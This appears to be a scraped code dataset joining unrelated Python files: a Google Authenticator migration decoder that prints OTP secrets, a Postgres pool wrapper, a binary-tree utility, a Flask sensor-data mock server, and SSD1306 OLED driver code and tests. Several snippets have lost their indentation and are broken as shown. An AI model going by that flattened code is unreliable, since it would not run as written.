field_value = getattr(parent, field_name)
return parent.DESCRIPTOR.fields_by_name[field_name].enum_type.values_by_number.get(field_value).name
    def convert_secret_from_bytes_to_base32_str(secret_bytes):
        return str(base64.b32encode(secret_bytes), 'utf-8').replace('=', '')
line = url
i = j = 0
if line.startswith('#') or line == '': print("no data in string passed")
parsed_url = urlparse(line)
params = parse_qs(parsed_url.query)
if not 'data' in params:
print('\nERROR: no data query parameter in input URL\ninput file: {}\nline "{}"\nProbably a wrong file was given')
data_encoded = params['data'][0]
data = base64.b64decode(data_encoded)
payload = generated_python.google_auth_pb2.MigrationPayload()
payload.ParseFromString(data)
i += 1
# pylint: disable=no-member
json = ""
json+= "<$beginwristkeygoogleauthenticatorimport$>"
json+=("{")
for otp in payload.otp_parameters:
j += 1
secret = convert_secret_from_bytes_to_base32_str(otp.secret)
url_params = { 'secret': secret }
if otp.type == 1: url_params['counter'] = otp.counter
if otp.issuer: url_params['issuer'] = otp.issuer
otp_url = 'otpauth://{}/{}?'.format('totp' if otp.type == 2 else 'hotp', quote(otp.name)) + urlencode(url_params)
if otp.issuer == "":
json+=("\""+otp.name+"\""+":")
else:
json+=("\""+otp.issuer+"\""+":")
json+=("{")
json+=("\"secret\""+":"+"\""+secret+"\""+",")
json+=("\"username\""+":"+"\""+otp.name+"\""+",")
json+=("\"type\""+":"+"\""+str(otp.type)+"\""+"")
json+=("},")
json=json[:-1]
json+=("}")
json+= "<$endwristkeygoogleauthenticatorimport$>"
print(json)
``` |
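The interesting step in `decode` is turning each migration entry back into a standard `otpauth://` URL. A small, hedged sketch of that construction with made-up values (the secret below is a well-known documentation example, not real data):
```python
from urllib.parse import urlencode, quote

secret = "JBSWY3DPEHPK3PXP"      # illustrative base32 secret
name = "alice@example.org"
issuer = "ExampleIssuer"

otp_url = "otpauth://totp/{}?".format(quote(name)) + urlencode({"secret": secret, "issuer": issuer})
print(otp_url)  # otpauth://totp/alice%40example.org?secret=JBSWY3DPEHPK3PXP&issuer=ExampleIssuer
```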
{
"source": "4Five-Labs-Inc/ML_REST_API_Boilerplate",
"score": 3
} |
#### File: src/database/connection.py
```python
import os
import psycopg2
from psycopg2 import pool
from dotenv import load_dotenv
load_dotenv()
class Connection:
"""
initialize constructor
creates database connection
"""
def __init__(self):
try:
self.pool = psycopg2.pool.SimpleConnectionPool(1, 20, user = os.getenv('DB_USER'),
password = os.getenv('<PASSWORD>'),
host = os.getenv('DB_HOST'),
port = os.getenv('DB_PORT'),
database = os.getenv('DB_NAME'))
except (Exception, psycopg2.Error) as error :
print ("Error while connecting to Database", error)
"""
fetch_query executes the fetch query
:param query: any string
:return: list
"""
def fetch_query(self, query):
try:
connection = self.pool.getconn()
cursor = connection.cursor()
cursor.execute(query)
return cursor.fetchall()
except (Exception, psycopg2.Error) as error :
print ("Error while executing query", error)
finally:
            # return the connection to the pool instead of closing it
            if(connection):
                cursor.close()
                self.pool.putconn(connection)
"""
insert_query executes the input query
:param query: any string
:param values: dict
:return: list
"""
def insert_query(self, query, values):
try:
connection = self.pool.getconn()
cursor = connection.cursor()
cursor.execute(query, values)
return connection.commit()
except (Exception, psycopg2.Error) as error :
print ("Error while executing query", error)
finally:
            # return the connection to the pool instead of closing it
            if(connection):
                cursor.close()
                self.pool.putconn(connection)
``` |
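A short, hedged usage sketch of the `Connection` wrapper; the table and column names are invented for illustration, a populated `.env` with the `DB_*` variables is assumed, and the import path may differ depending on how the package is laid out:
```python
from connection import Connection  # assumed import path for the module above

conn = Connection()
rows = conn.fetch_query("SELECT id, name FROM models;")   # returns a list of row tuples
print(rows)

conn.insert_query(
    "INSERT INTO models (name, score) VALUES (%s, %s);",  # parameters are passed separately
    ("baseline", 0.91),
)
```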
{
"source": "4ft35t/utils",
"score": 4
} |
#### File: 4ft35t/utils/tree.py
```python
class Node(object):
def __init__(self, value, left=None, right=None):
self.value = value
self.left = left
self.right = right
class Tree(object):
def __init__(self):
self.root = None
def __build_tree_inorder_preorder(self, in_order, pre_order):
        '''Rebuild a binary tree from its inorder and preorder traversal sequences.
        1. The first node of the preorder sequence is always the root; in a preorder
           traversal a parent node is always visited before its children.
        2. In the inorder sequence, the n nodes to the left of the root form the left
           subtree and the m nodes to the right form the right subtree.
        3. Accordingly, in the preorder sequence, counting from the second node, the
           first n nodes belong to the left subtree and the remaining m to the right.
        '''
        if not (in_order and pre_order):  # either sequence is empty
return
root = pre_order[0]
root_index = in_order.index(root)
node = Node(root)
        # recursively build the left and right subtrees
        node.left = self.__build_tree_inorder_preorder(in_order[:root_index], pre_order[1:root_index+1])
        node.right = self.__build_tree_inorder_preorder(in_order[root_index+1:], pre_order[root_index+1:])
return node
def __build_tree_inorder_postorder(self, in_order, post_order):
        '''Rebuild a binary tree from its inorder and postorder traversal sequences.
        1. The last element of the postorder sequence is the root.
        2. In the inorder sequence, the n nodes to the left of the root form the left
           subtree and the m nodes to the right form the right subtree.
        3. Accordingly, in the postorder sequence, the first n nodes belong to the left
           subtree and the following m nodes to the right subtree.
        '''
        if not (in_order and post_order):  # either sequence is empty
return
root = post_order[-1]
root_index = in_order.index(root)
node = Node(root)
        # recursively build the left and right subtrees
node.left = self.__build_tree_inorder_postorder(in_order[:root_index], post_order[:root_index])
node.right = self.__build_tree_inorder_postorder(in_order[root_index+1:], post_order[root_index:-1])
return node
def build_tree(self, root=None, left=None, right=None, in_order=None, pre_order= None, post_order=None):
        if root is not None:  # node values supplied directly
self.root = Node(root, left, right)
return
        if in_order:  # rebuild the tree from known traversal sequences
            if pre_order:  # preorder sequence given
                self.root = self.__build_tree_inorder_preorder(in_order, pre_order)
            elif post_order:  # postorder sequence given
                self.root = self.__build_tree_inorder_postorder(in_order, post_order)
def pre_order(self):
        '''Preorder traversal.
        '''
root = self.root
def __pre_order(r):
if r:
yield r.value
for i in __pre_order(r.left):
yield i
for i in __pre_order(r.right):
yield i
return [i for i in __pre_order(root)]
def in_order(self):
        '''Inorder traversal.
        Ref: http://www.gocalf.com/blog/traversing-binary-tree.html
             http://coolshell.cn/articles/9886.html
        '''
root = self.root
def __in_order(r):
if not r:
return
for i in __in_order(r.left):
yield i
yield r.value
for i in __in_order(r.right):
yield i
return [i for i in __in_order(root)]
def post_order(self, r=None):
        '''Postorder traversal.
        '''
root = self.root
def __post_order(r):
if not r:
return
for i in __post_order(r.left):
yield i
for i in __post_order(r.right):
yield i
yield r.value
return [i for i in __post_order(root)]
def get_all_depth(self):
        '''Compute the depth of every node (preorder traversal).
        Ref: http://cnn237111.blog.51cto.com/2359144/842146
        '''
root = self.root
def __get_depth(r, depth=1):
if not r:
return
yield (r.value, depth)
depth += 1
for i in __get_depth(r.left, depth):
yield i
for i in __get_depth(r.right, depth):
yield i
return dict(__get_depth(root))
def get_leaf_node(self):
        '''Collect all leaf nodes.
        '''
root = self.root
def __get_leaf(r):
if not r:
return
if r.left is None and r.right is None:
yield r
for i in __get_leaf(r.left):
yield i
for i in __get_leaf(r.right):
yield i
return [i for i in __get_leaf(root)]
def get_path(self, value, root=None):
        '''Return the visiting path from the root to the node with the given value.
        Ref: http://blog.csdn.net/GetNextWindow/article/details/23332265
        '''
if not root:
root = self.root
stack = []
def __get_path(root):
stack.append(root.value)
found = False
if root.value == value:
return stack
            if not found and root.left:  # search the left subtree first
found = __get_path(root.left)
if not found and root.right:
found = __get_path(root.right)
            if not found:  # not found in either subtree of the current node
stack.pop()
return found
return __get_path(root)
def test():
import pdb;pdb.set_trace()
n1 = Node(1, Node(2), Node(3))
n2 = Node(4, Node(5))
t = Tree()
t.build_tree(0, n1, n2)
    print(t.pre_order())
    print(t.in_order())
    print(t.post_order())
t1 = Tree()
t1.build_tree('X', n2, t.root)
    print(t1.pre_order())
    print(t.get_all_depth())
in_list = 'ABCDEFGHI'
post_list = 'ACEDBHIGF'
t.build_tree(in_order=in_list, post_order=post_list)
    print(t.get_all_depth())
    print([i.value for i in t.get_leaf_node()])
    print(t.get_path('H'))
in_list = "T b H V h 3 o g P W F L u A f G r m 1 x J 7 w e 0 i Q Y n Z 8 K v q k 9 y 5 C N B D 2 4 U l c p I E M a j 6 S R O X s d z t".split(" ")
post_list = "T V H o 3 h P g b F f A u m r 7 J x e w 1 Y Q i 0 Z n G L K y 9 k q v N D B C 5 4 c l U 2 8 E I R S 6 j d s X O a M p W t z".split(" ")
t.build_tree(in_order= in_list, post_order=post_list)
depth = t.get_all_depth()
max_depth = sorted(depth.items(), key= lambda x:x[1], reverse=True)[0]
    print(max_depth)
    print(t.get_path(max_depth[0]))
if __name__ == '__main__':
test()
``` |
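To make the reconstruction logic described in the docstrings concrete, here is a small worked example; the tree shape and traversal sequences are illustrative:
```python
# For the tree        A
#                    / \
#                   B   C
#                  / \
#                 D   E
# inorder = D B E A C, preorder = A B D E C
t = Tree()
t.build_tree(in_order=list('DBEAC'), pre_order=list('ABDEC'))
print(t.post_order())   # ['D', 'E', 'B', 'C', 'A']
print(t.get_path('E'))  # ['A', 'B', 'E']
```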
{
"source": "4gatepylon/NeuroMHW",
"score": 2
} |
#### File: 4gatepylon/NeuroMHW/simpleserverneuro.py
```python
import os
# import pymongo
import json
import random
import hashlib
import time
import requests
from flask import Flask, request, abort, Response
from flask_cors import CORS
from hashlib import sha256
app = Flask(__name__)
CORS(app)
def hashthis(st):
hash_object = hashlib.md5(st.encode())
h = str(hash_object.hexdigest())
return h
@app.route('/simple', methods=['GET', 'POST'])
def simple():
# js = transcribe()
request_json = request.get_json()
    action = request_json['action']
retjson = {}
if action == "doNothing":
doaction = "none"
data = {}
ecg = []
eeg = []
emg = []
for i in range(50):
datai = random.randint(0, 1024)
ecg.append(datai)
datai = random.randint(0, 1024)
eeg.append(datai)
datai = random.randint(0, 1024)
emg.append(datai)
data['ecg'] = ecg
data['eeg'] = eeg
data['emg'] = emg
retjson['doaction'] = doaction
retjson['data'] = data
return json.dumps(retjson)
if action == "doBeep":
doaction = "sound"
data = {}
ecg = []
eeg = []
emg = []
for i in range(50):
datai = random.randint(0, 1024)
ecg.append(datai)
datai = random.randint(0, 1024)
eeg.append(datai)
datai = random.randint(0, 1024)
emg.append(datai)
data['ecg'] = ecg
data['eeg'] = eeg
data['emg'] = emg
retjson['doaction'] = doaction
retjson['data'] = data
return json.dumps(retjson)
if action == "doNudge":
doaction = "motor"
data = {}
ecg = []
eeg = []
emg = []
for i in range(50):
datai = random.randint(0, 1024)
ecg.append(datai)
datai = random.randint(0, 1024)
eeg.append(datai)
datai = random.randint(0, 1024)
emg.append(datai)
data['ecg'] = ecg
data['eeg'] = eeg
data['emg'] = emg
retjson['doaction'] = doaction
retjson['data'] = data
return json.dumps(retjson)
if action == "doPopup":
doaction = "notify"
data = {}
ecg = []
eeg = []
emg = []
for i in range(50):
datai = random.randint(0, 1024)
ecg.append(datai)
datai = random.randint(0, 1024)
eeg.append(datai)
datai = random.randint(0, 1024)
emg.append(datai)
data['ecg'] = ecg
data['eeg'] = eeg
data['emg'] = emg
retjson['doaction'] = doaction
retjson['data'] = data
return json.dumps(retjson)
retjson['status'] = "command unknown"
return json.dumps(retjson)
@app.route('/', methods=['GET', 'POST'])
def hello_world():
# js = transcribe()
js = {}
js['status'] = 'done'
    resp = Response(json.dumps(js), status=200, mimetype='application/json')
print ("****************************")
print (resp)
return js
# return resp
@app.route("/dummyJson", methods=['GET', 'POST'])
def dummyJson():
res = request.get_json()
print (res)
resraw = request.get_data()
print (resraw)
## args = request.args
## form = request.form
## values = request.values
## print (args)
## print (form)
## print (values)
## sres = request.form.to_dict()
status = {}
status["server"] = "up"
status["request"] = res
statusjson = json.dumps(status)
print(statusjson)
js = "<html> <body>OK THIS WoRKS</body></html>"
resp = Response(statusjson, status=200, mimetype='application/json')
##resp.headers['Link'] = 'http://google.com'
return resp
if __name__ == '__main__':
# app.run()
# app.run(debug=True, host = '192.168.127.12', port = 8005)
app.run(debug=True, host = 'localhost', port = 8005) ##change hostname here
``` |
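A hedged client-side sketch for the `/simple` endpoint above, assuming the Flask server is running on the host and port configured at the bottom of the file:
```python
import requests

resp = requests.post(
    "http://localhost:8005/simple",
    json={"action": "doBeep"},        # one of: doNothing, doBeep, doNudge, doPopup
)
reply = resp.json()
print(reply["doaction"])              # "sound" for doBeep
print(len(reply["data"]["ecg"]))      # 50 simulated samples per channel
```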
{
"source": "4gbag/ssd1306",
"score": 3
} |
#### File: ssd1306/examples/perfloop.py
```python
import sys
import time
from PIL import Image, ImageDraw
from demo_opts import device
import demo
class Timer:
def __enter__(self):
        self.start = time.perf_counter()
return self
def __exit__(self, *args):
        self.end = time.perf_counter()
self.interval = self.end - self.start
def main():
elapsed_time = 0
count = 0
print("Testing OLED dislay rendering performance")
print("Press Ctrl-C to abort test\n")
image = Image.new(device.mode, device.size)
draw = ImageDraw.Draw(image)
demo.primitives(draw)
for i in range(5, 0, -1):
sys.stdout.write("Starting in {0} seconds...\r".format(i))
sys.stdout.flush()
time.sleep(1)
try:
while True:
with Timer() as t:
device.display(image)
elapsed_time += t.interval
count += 1
if count % 31 == 0:
avg_transit_time = elapsed_time * 1000 / count
avg_fps = count / elapsed_time
sys.stdout.write("#### iter = {0:6d}: render time = {1:.2f} ms, frame rate = {2:.2f} FPS\r".format(count, avg_transit_time, avg_fps))
sys.stdout.flush()
except KeyboardInterrupt:
del image
if __name__ == "__main__":
main()
```
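The `Timer` context manager above is self-contained, so it can be reused to time any callable; a minimal sketch, assuming `Timer` from this example is in scope (the workload is arbitrary):
```python
with Timer() as t:
    sum(range(1_000_000))                            # any workload to measure
print("took {0:.3f} ms".format(t.interval * 1000))   # interval is set in __exit__
```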
#### File: ssd1306/oled/serial.py
```python
class i2c(object):
"""
Wrap an `I2C <https://en.wikipedia.org/wiki/I%C2%B2C>`_ interface to
provide data and command methods.
.. note::
1. Only one of ``bus`` OR ``port`` arguments should be supplied;
if both are, then ``bus`` takes precedence.
2. If ``bus`` is provided, there is an implicit expectation
that it has already been opened.
"""
def __init__(self, bus=None, port=1, address=0x3C):
import smbus2
self._cmd_mode = 0x00
self._data_mode = 0x40
self._bus = bus or smbus2.SMBus(port)
self._addr = address
def command(self, *cmd):
"""
Sends a command or sequence of commands through to the I2C address
- maximum allowed is 32 bytes in one go.
"""
assert(len(cmd) <= 32)
self._bus.write_i2c_block_data(self._addr, self._cmd_mode, list(cmd))
def data(self, data):
"""
Sends a data byte or sequence of data bytes through to the I2C
address - maximum allowed in one transaction is 32 bytes, so if
data is larger than this, it is sent in chunks.
"""
i = 0
n = len(data)
write = self._bus.write_i2c_block_data
while i < n:
write(self._addr, self._data_mode, list(data[i:i + 32]))
i += 32
def cleanup(self):
"""
Clean up I2C resources
"""
self._bus.close()
class spi(object):
"""
Wraps an `SPI <https://en.wikipedia.org/wiki/Serial_Peripheral_Interface_Bus>`_
interface to provide data and command methods.
* The DC pin (Data/Command select) defaults to GPIO 24 (BCM).
* The RST pin (Reset) defaults to GPIO 25 (BCM).
"""
def __init__(self, spi=None, gpio=None, port=0, device=0, bus_speed_hz=8000000, bcm_DC=24, bcm_RST=25):
self._gpio = gpio or self.__rpi_gpio__()
self._spi = spi or self.__spidev__()
self._spi.open(port, device)
self._spi.max_speed_hz = bus_speed_hz
self._bcm_DC = bcm_DC
self._bcm_RST = bcm_RST
self._cmd_mode = self._gpio.LOW # Command mode = Hold low
self._data_mode = self._gpio.HIGH # Data mode = Pull high
self._gpio.setmode(self._gpio.BCM)
self._gpio.setup(self._bcm_DC, self._gpio.OUT)
self._gpio.setup(self._bcm_RST, self._gpio.OUT)
self._gpio.output(self._bcm_RST, self._gpio.HIGH) # Keep RESET pulled high
def __rpi_gpio__(self):
# RPi.GPIO _really_ doesn't like being run on anything other than
# a Raspberry Pi... this is imported here so we can swap out the
# implementation for a mock
import RPi.GPIO
return RPi.GPIO
def __spidev__(self):
        # spidev can't compile on macOS, so use a similar technique to
# initialize (mainly so the tests run unhindered)
import spidev
return spidev.SpiDev()
def command(self, *cmd):
"""
Sends a command or sequence of commands through to the SPI device.
"""
self._gpio.output(self._bcm_DC, self._cmd_mode)
self._spi.xfer2(list(cmd))
def data(self, data):
"""
Sends a data byte or sequence of data bytes through to the SPI device.
If the data is more than 4Kb in size, it is sent in chunks.
"""
self._gpio.output(self._bcm_DC, self._data_mode)
i = 0
n = len(data)
write = self._spi.xfer2
while i < n:
write(data[i:i + 4096])
i += 4096
def cleanup(self):
"""
Clean up SPI & GPIO resources
"""
self._spi.close()
self._gpio.cleanup()
class noop(object):
"""
Does nothing, used for pseudo-devices / emulators, which dont have a serial
interface.
"""
def command(self, *cmd):
pass
def data(self, data):
pass
def cleanup(self):
pass
```
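To illustrate how these serial wrappers are consumed, here is a hedged sketch that wires an `spi` interface into a display driver and draws on it. It assumes an SSD1331 module on the default SPI port of a Raspberry Pi and uses only classes that appear elsewhere in this repository (`oled.device.ssd1331`, `oled.render.canvas`):
```python
from oled.serial import spi
from oled.device import ssd1331
from oled.render import canvas

serial = spi(port=0, device=0, bcm_DC=24, bcm_RST=25)  # defaults shown explicitly
device = ssd1331(serial)

with canvas(device) as draw:          # canvas yields a PIL ImageDraw bound to the device
    draw.rectangle((0, 0, 95, 63), outline="white")
    draw.text((10, 25), "Hello", fill="white")
```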
#### File: ssd1306/tests/test_ssd1331.py
```python
try:
from unittest.mock import call, Mock
except ImportError:
from mock import call, Mock
import pytest
from oled.device import ssd1331
from oled.render import canvas
import baseline_data
serial = Mock(unsafe=True)
def setup_function(function):
serial.reset_mock()
serial.command.side_effect = None
def test_init_96x64():
ssd1331(serial)
serial.command.assert_has_calls([
# Initial burst are initialization commands
call(174, 160, 114, 161, 0, 162, 0, 164, 168, 63, 173,
142, 176, 11, 177, 116, 179, 208, 138, 128, 139,
128, 140, 128, 187, 62, 190, 62, 135, 15),
# set contrast
call(129, 255, 130, 255, 131, 255),
# reset the display
call(21, 0, 95, 117, 0, 63),
# called last, is a command to show the screen
call(175)
])
    # Next 12288 bytes are all data: zeros to clear the RAM
    # (12288 = 96 * 64 * 2)
serial.data.assert_called_once_with([0] * 96 * 64 * 2)
def test_init_invalid_dimensions():
with pytest.raises(ValueError) as ex:
ssd1331(serial, width=23, height=57)
assert "Unsupported display mode: 23x57" in str(ex.value)
def test_init_handle_ioerror():
serial.command.side_effect = IOError(-99, "Test exception")
with pytest.raises(IOError) as ex:
ssd1331(serial)
assert "Failed to initialize SSD1331 display driver" in str(ex.value)
def test_hide():
device = ssd1331(serial)
serial.reset_mock()
device.hide()
serial.command.assert_called_once_with(174)
def test_show():
device = ssd1331(serial)
serial.reset_mock()
device.show()
serial.command.assert_called_once_with(175)
def test_display():
device = ssd1331(serial)
serial.reset_mock()
# Use the same drawing primitives as the demo
with canvas(device) as draw:
baseline_data.primitives(device, draw)
# Initial command to reset the display
serial.command.assert_called_once_with(21, 0, 95, 117, 0, 63)
    # Next 12288 bytes are data representing the drawn image
serial.data.assert_called_once_with(baseline_data.demo_ssd1331)
``` |